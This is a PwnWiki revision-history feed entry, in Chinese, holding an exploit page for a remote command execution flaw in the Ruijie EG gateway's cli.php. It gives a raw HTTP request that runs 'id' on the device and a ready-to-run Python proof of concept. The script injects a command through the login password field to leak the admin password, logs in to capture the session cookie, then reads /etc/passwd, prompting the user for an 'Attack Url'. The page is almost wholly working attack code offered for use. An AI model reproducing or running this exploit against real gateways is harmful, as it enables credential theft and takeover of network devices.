https://pwnwiki.com/index.php?action=history&feed=atom&title=%E9%8A%B3%E6%8D%B7EG%E6%98%93%E7%B6%B2%E9%97%9C_cli.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 銳捷EG易網關 cli.php 遠程命令執行漏洞 - Revision history 2026-04-13T21:12:14Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=%E9%8A%B3%E6%8D%B7EG%E6%98%93%E7%B6%B2%E9%97%9C_cli.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2710&oldid=prev Pwnwiki: Created page with "==漏洞利用== 發送以下請求: <pre> POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Content-Type: application/x-www-form-urlenco..." 2021-05-07T08:50:04Z <p>Created page with &quot;==漏洞利用== 發送以下請求: &lt;pre&gt; POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Content-Type: application/x-www-form-urlenco...&quot;</p> <p><b>New page</b></p><div>==漏洞利用==<br /> 發送以下請求:<br /> &lt;pre&gt;<br /> POST /cli.php?a=shell HTTP/1.1<br /> Host: <br /> User-Agent: Go-http-client/1.1<br /> Content-Length: 24<br /> Content-Type: application/x-www-form-urlencoded<br /> Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin; <br /> X-Requested-With: XMLHttpRequest<br /> Accept-Encoding: gzip<br /> <br /> notdelay=true&amp;command=id<br /> &lt;/pre&gt;<br /> <br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> #!/usr/bin/python3<br /> #-*- coding:utf-8 -*-<br /> # author : PeiQi<br /> # from : http://wiki.peiqi.tech<br /> <br /> import base64<br /> import requests<br /> import random<br /> import re<br /> import json<br /> import sys<br /> <br /> def title():<br /> print('+------------------------------------------')<br /> print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br /> print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br /> print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br /> print('+ \033[34mVersion: 锐捷EG网关 cli.php RCE \033[0m')<br /> print('+ \033[36m使用格式: python3 poc.py \033[0m')<br /> print('+ \033[36mUrl &gt;&gt;&gt; http://xxx.xxx.xxx.xxx \033[0m')<br /> print('+------------------------------------------')<br /> <br /> def POC_1(target_url):<br /> vuln_url = target_url + &quot;/login.php&quot;<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;<br /> }<br /> data = 'username=admin&amp;password=admin?show+webmaster+user'<br /> try:<br /> response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)<br /> print(&quot;\033[36m[o] 正在执行 show webmaster user \033[0m&quot;.format(target_url))<br /> if &quot;data&quot; in response.text and response.status_code == 200:<br /> password = re.findall(r'admin (.*?)&quot;', response.text)[0]<br /> print(&quot;\033[36m[o] 成功获取, 账号密码为: admin {} \033[0m&quot;.format(password))<br /> POC_2(target_url, password)<br /> except Exception as e:<br /> print(&quot;\033[31m[x] 请求失败:{} \033[0m&quot;.format(e))<br /> sys.exit(0)<br /> <br /> def POC_2(target_url, password):<br /> vuln_url = target_url + &quot;/login.php&quot;<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;<br /> }<br /> data = 'username=admin&amp;password={}'.format(password)<br /> try:<br /> response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)<br /> print(&quot;\033[36m[o] 正在登录..... \033[0m&quot;.format(target_url))<br /> if &quot;status&quot; in response.text and &quot;1&quot; in response.text and response.status_code == 200:<br /> ruijie_cookie = &quot;RUIJIEID=&quot; + re.findall(r&quot;'Set-Cookie': 'RUIJIEID=(.*?);&quot;, str(response.headers))[0] + &quot;;user=admin;&quot;<br /> print(&quot;\033[36m[o] 成功获取管理员Cookie: {} \033[0m&quot;.format(ruijie_cookie))<br /> POC_3(target_url, ruijie_cookie)<br /> <br /> except Exception as e:<br /> print(&quot;\033[31m[x] 请求失败:{} \033[0m&quot;.format(e))<br /> sys.exit(0)<br /> <br /> def POC_3(target_url, ruijie_cookie):<br /> vuln_url = target_url + &quot;/cli.php?a=shell&quot;<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,<br /> &quot;Cookie&quot;: &quot;{}&quot;.format(ruijie_cookie)<br /> }<br /> data = 'notdelay=true&amp;command=cat /etc/passwd'<br /> try:<br /> response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)<br /> print(&quot;\033[36m[o] 正在执行 cat /etc/passwd..... \033[0m&quot;.format(target_url))<br /> if &quot;root:&quot; in response.text and response.status_code == 200:<br /> print(&quot;\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m&quot;.format(response.text))<br /> <br /> except Exception as e:<br /> print(&quot;\033[31m[x] 请求失败:{} \033[0m&quot;.format(e))<br /> sys.exit(0)<br /> <br /> <br /> if __name__ == '__main__':<br /> title()<br /> target_url = str(input(&quot;\033[35mPlease input Attack Url\nUrl &gt;&gt;&gt; \033[0m&quot;))<br /> POC_1(target_url)<br /> &lt;/pre&gt;<br /> <br /> <br /> ==參考==<br /> http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html</div> Pwnwiki